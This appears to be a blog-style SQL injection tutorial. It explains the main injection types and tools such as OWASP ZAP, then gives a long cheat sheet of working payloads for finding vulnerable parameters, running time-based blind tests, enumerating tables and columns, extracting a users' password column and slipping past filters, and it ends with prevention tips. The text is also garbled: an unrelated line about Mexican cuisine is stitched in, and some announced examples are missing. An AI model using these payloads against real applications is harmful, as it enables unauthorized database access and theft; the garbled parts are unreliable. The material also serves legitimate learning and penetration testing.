What is SQL:
SQL injection is a type of cyber attack in which an attacker can exploit vulnerabilities in a web application's software to inject malicious code into the database. This can allow the attacker to gain unauthorized access to sensitive information or even take control of the entire database. There are several types of SQL injection attacks, including in-band, out-of-band, and blind attacks, each with their own methods of exploiting web application vulnerabilities. SQL injection attacks can be prevented by using secure coding practices and by regularly testing web applications for vulnerabilities.
What type of SQLi:
- In-pand
- Error-based injections
- Union-based injections
- Out-of-pand injections
- Inferential or Blind
- Boolean-based attack:
Get information about the database and its structure from its error messages. In another word, the attacker will benefit from the error messages leaked from the database.
Example, just type the " on any input field. the error message going to reveal and leak some of the database information.
Combine the results from a normal query another from our attack to extract additional data.
Exfiltrate data using a different channel than the request was made with. It can use HTTP, DNS
This attack relay on change of behavior with the database in order to re-construct information. This method is used when the data doesn't send back to the attacker. Most of the time it takes time to triggers usually by using time delay and true-false condition.
using the URL with this commands:
https://url.com/v1/products/346'%20or%201=1;
to be something like this:
b. Time-based attack:
specify an amount of time when the query is true otherwise return the result without a delay. This attack will give the attacker a chance to figure out is something is true or not.
In this attack the attacker need to know the database server in order to perform this attack. The previous attack work on Oracle but will not work with others. On MySQL you can use SLEEP() or BENCHMARK().
Source: Food Icons on the Evolving Role of Mexican Cuisine in LA
OWASP ZAP ( Zed Attack Proxy) tools for SQLI
Zap is a man in a middle proxy intercept messages sent between the browser and a web application. It is helpful for pen testing because it allows us to inspect and modify the content of a message and then forward the package into the destination.
If the application has a security mechanisms on the front end, we can bypass them and communicate directly with the backend.
An alternative tool to zap is [Burp suite].
Every database has a table where it stores its metadata. Look at the picture below to get an idea of what these table called in different database servers.
You can inquiry that in PostgresSQL simply by this command
SELECT * FROM information_schema.tables;
on Oracle even simpler by
SELECT table_name FROM dba_tables;
SQL-Injection-cheat-sheet
- First try to figure out the vulnerable parameter
NOTE: If it's a GET request don't forget to url encode the characters.
param=' --> try to get error
param=" --> try to get error
param=' or 1=1 --> try if it works
param=' or 1=0 --> check if it returns nothing
param=' and 1=1 --> check if this works or produces error
Try with blind injection payloads if above commands does not produce error
' or sleep(2) and 1=1# --> try get delay, sleep only operates when all other conditions are true and there is a requirement to operate it.
' or sleep(2)# --> try get delay
admin' and sleep(2)# --> will delay only if the user admin exists
' union select sleep(2),null# --> check if it produces delay
' union select sleep(2),null,null,null,null# --> check if it produces delay, check for different number of columns
Try if above queries work by appending comment at the end
param=' or 1=1# --> try if it works
param=' or 1=1 -- one space needed --> try if it works
param=' or 1=1 // --> try if it works
param= or 1=1# --> try if it works
param=and or 1=1# --> try if it works
param=' or 1=1-- sd --> try if it works
' AND (select 1)=1 <-- This should be TRUE Response -- subselect supported
- Now that we know the vulnerable parameter, let's try guessing the table name:
' AND (select 1 from admin limit 0,1)=1 <-- FALSE
' AND (select 1 from users limit 0,1)=1 <-- TRUE ======> Table found 'users'
- Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE =====> Column 'password' found.
- Now determine number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by 10#
let say there are 3 columns
- Now determine vulnerable columns or columns which are visible
param=' or 1=0 union select null,null,null# --> if it produces no error then try
param=' or 1=0 union select 1,2,3# --> check which number shows in web page
Else try
param=' or 1=1 union select table_name,null,null from information_schema.tables#
if it produces error try table_name at other positions
Now, lets say column 1,2 are shown in web page
- To futher enumerate
param=' or 1=0 union select table_schema,null,null from information_schema.columns# --> display all database name
Note 1=0 in above query to show only databases
param=' or 1=0 union select version(),null,null from information_schema.columns# --> retrieve version
param=' or 1=0 union select @@version,null,null from information_schema.columns# --> retrieve version in mssql
param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns# --> return true if version is 1.x.x
param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns# --> return true if version is 5.x.x
param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns# --> return true if version is 5.2.x
param=' or 1=0 union select table_name,null,null from information_schema.columns# --> display all table name
param=' or 1=1 select table_name,null,null from information_schema.columns where table_schema='public'# --> display tables inside public database
param=' or 1=1 select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'# --> display all columns of info table
param=' or 1=1 select table_name as table,column_name as column,null from information_schema.columns#
Let say the database name is public
and table name is info
with two columns in it id
and name
.
param=' or 1=0 union select id,null,null from public.info# --> display id column from table "info"
param=' or 1=0 union select id,name,null from public.info# --> display id and name column from table "info"
param=' or 1=0 union select id,name,null from public.info where id='papa'# --> display id and name of 'papa'
- BYPASSING filters
we can use case switching or commenting to bypass basic filters
param=' or 1=0 UniOn selEct id,null,null FroM public.info#
param=' or 1=0 un/**/ion sele/**/ct id,null,null fr/**/om public.info# works in mssql
- For Oracle DB
Oracle does not have information schema and thus we need some alternatives for it. The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names
- For Adanced exploitation, we may use sqlmap
Some tips to prevent SQL injection attacks include:
- Use prepared statements or parameterized queries instead of dynamically building SQL statements with user input.
- Use stored procedures instead of dynamically building SQL statements with user input.
- Use input validation to ensure that user input conforms to expected formats and ranges.
- Use proper error handling to prevent sensitive information from being leaked in error messages.
- Use least privilege access controls to limit the permissions of database users and applications.
- Keep database software up to date with the latest security patches and updates.
- Conduct regular security testing, including vulnerability scans and penetration testing, to identify and address any vulnerabilities.
It's important to note that preventing SQL injection attacks requires a multi-layered approach, and no single technique or tool can completely eliminate the risk of an attack.
Some useful cheat Sheet for SQLi
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
https://sqlzoo.net/wiki/SQL_Tutorial
https://portswigger.net/web-security/sql-injection/blind
https://portswigger.net/web-security/sql-injection/examining-the-database